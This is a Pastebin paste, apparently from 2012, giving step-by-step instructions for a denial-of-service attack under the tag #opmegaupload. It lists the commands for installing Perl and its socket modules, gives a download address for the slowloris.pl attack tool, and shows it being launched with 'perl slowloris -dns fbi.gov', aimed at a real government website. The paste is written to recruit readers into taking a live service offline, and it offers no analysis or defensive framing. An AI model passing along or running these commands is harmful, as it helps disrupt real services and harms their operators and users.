Advertisement
Guest User

Running SlowLORIS over Linux for #opmegaupload

a guest
Jan 19th, 2012
993
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.48 KB | None | 0 0
  1. Running SlowLORIS over Linux for #opmegaupload
  2.  
  3. #1- Install Perl, if you are at ubuntu just run in terminal:
  4.  
  5. sudo apt-get install perl
  6.  
  7. #2- Install the INET and SSL modules, run in your terminal:
  8.  
  9. perl -MCPAN -e 'install IO::Socket::INET'
  10. perl -MCPAN -e 'install IO::Socket::SSL'
  11.  
  12. #3- Go to the address and download the file slowloris.pl
  13.  
  14. http://ha.ckers.org/slowloris/slowloris.pl
  15.  
  16. #4- Run in your terminal:
  17.  
  18. perl slowloris -dns <target>
  19.  
  20. perl slowloris -dns fbi.gov
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement